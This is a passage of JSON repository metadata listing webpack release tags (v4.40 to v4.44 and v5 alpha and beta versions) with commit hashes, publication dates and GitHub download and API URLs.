,"published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.